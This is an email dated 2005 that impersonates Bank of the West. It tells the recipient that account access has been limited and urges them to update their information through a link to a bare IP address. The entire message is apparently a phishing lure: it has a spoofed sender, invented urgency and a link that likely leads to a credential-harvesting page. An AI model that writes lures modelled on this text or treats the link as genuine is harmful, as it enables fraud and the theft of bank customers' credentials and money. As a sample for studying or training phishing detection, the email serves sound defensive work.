Subject: Bank of the West Alerting Service

From: "[email-masked]" <[email-masked]>
Date: Thu, 01 Sep 2005 13:53:42 +0400

Dear Bank of the West Customer,
During our regular update and verification of the Internet Banking 
Accounts, we could not verify your current information. Either 
your information has been changed or incomplete, as a result your 
access to use our services has been limited. Please update your 
information.
 
To update your account information and start using our services 
please click on the link below:
http://202.131.103.146/bow/

Note: Requests for information will be initiated by Bank of the West 
Business Development; this process cannot be externally requested 
through Customer Support.
 
Sincerely,
Bank of the West
Security Department.